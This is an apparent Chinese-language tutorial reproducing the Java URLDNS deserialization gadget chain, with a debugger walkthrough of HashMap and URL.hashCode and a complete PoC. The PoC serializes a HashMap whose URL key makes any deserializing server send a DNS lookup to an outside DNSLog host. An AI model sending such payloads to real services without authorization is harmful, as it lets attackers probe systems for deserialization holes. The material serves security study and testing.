0x00 漏洞复现

实验环境

• DNSLog：http://ceye.io

• Java序列化payload生成：https://github.com/0ofo/Deswing

• JDK1.8

复现步骤

1. 先在DNSLog平台获得一个域名：

2. 使用Deswing工具生成URLDNS的序列化文件：

3. 编写一段反序列化代码：

public class DeserialDemo {
    public static void main(String[] args) throws Exception {
        Object o = deserialize("urldns.bin");    //传入上一步生成的序列化文件全路径
        System.out.println(o);
    }

    private static Object deserialize(String name) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(name));
        Object o = ois.readObject();
        return o;
    }
}

4. 执行后查看产生了DNSLog记录：

0x01 利用链分析

先来看反序列化后产生的是一个HashMap类型的对象，其中key为URL类型，value是一个String：

在Java反序列化中，如果目标对象定义了readObject方法，则ObjectInputStream在调用readObject方法时，也会反射调用目标对象的readObject方法。

既然我们这里反序列化出的是一个HashMap对象，那我们找找HashMap是否定义了该方法：

果然有，进入这个方法，将断点打到1397行：

这里调用了hash方法，跟进去：

继续调用key.hashCode()，跟进去：

前文提到HashMap对象的key是URL类型，所以这里是调用到了URL的hashCode方法，该方法的逻辑是：如果hashCode不等于-1，则直接返回，否则再调用handler的hashCode方法。点到hashCode的定义处可见其初始值为-1，所以这段逻辑也可理解为：如果hashCode是一个初始化值-1，则需要调用handler的hashCode方法为其赋值，如果不是-1，说明已经赋过值了，直接返回。

继续跟进到handler的hashCode方法里：

执行到这一行时，调用了getHostAddress方法，正是该函数触发了DNS请求。

可以使用Wireshark抓包DNS记录：

很明显我的路由器缓存了域名解析记录，这里的DNS记录是由路由器返回的。

总结利用链：

// HashMap(key, value)
//         URL.hashCode() 初始值-1
//             URLStreamHandler.hashCode

0x02 POC编写

根据前文的分析，先构造一个HashMap对象，key为URL类型，value随意：

URL url = new URL("http://milon.xxx.ceye.io");
Map<URL, Object> map = new HashMap<>();
map.put(url, "hello");

通过反射获取URL对象的hashCode方法，将其设置为-1：

Field hashCodeField = url.getClass().getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.setInt(url, -1);

定义一个序列化方法并调用：

private static void serializable(Object o, String name) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(name));
    oos.writeObject(o);
}

完整POC：

public class DeserialDemo {
    public static void main(String[] args) throws Exception {
        URL url = new URL("http://milon.xxx.ceye.io");
        Map<URL, Object> map = new HashMap<>();
        map.put(url, "hello");

        Field hashCodeField = url.getClass().getDeclaredField("hashCode");
        hashCodeField.setAccessible(true);
        hashCodeField.setInt(url, -1);

        serializable(map, "urldns.bin");

        Object o = deserialize("urldns.bin");
        System.out.println(o);
    }

    private static Object deserialize(String name) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(name));
        Object o = ois.readObject();
        return o;
    }

    private static void serializable(Object o, String name) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(name));
        oos.writeObject(o);
    }
}

注意：通过反射设置hashCode为-1，一定要放在map.put调用之后，因为map.put方法也会触发key的hashCode方法，如果先设为-1再调用map.put就会覆写hashCode的值，导致序列化写入的对象hashCode不是-1，那么反序列化时将无法触发DNS查询。

参考

【Java安全-基础】URLDNS反序列化利用链

[课程]Linux pwn 探索篇！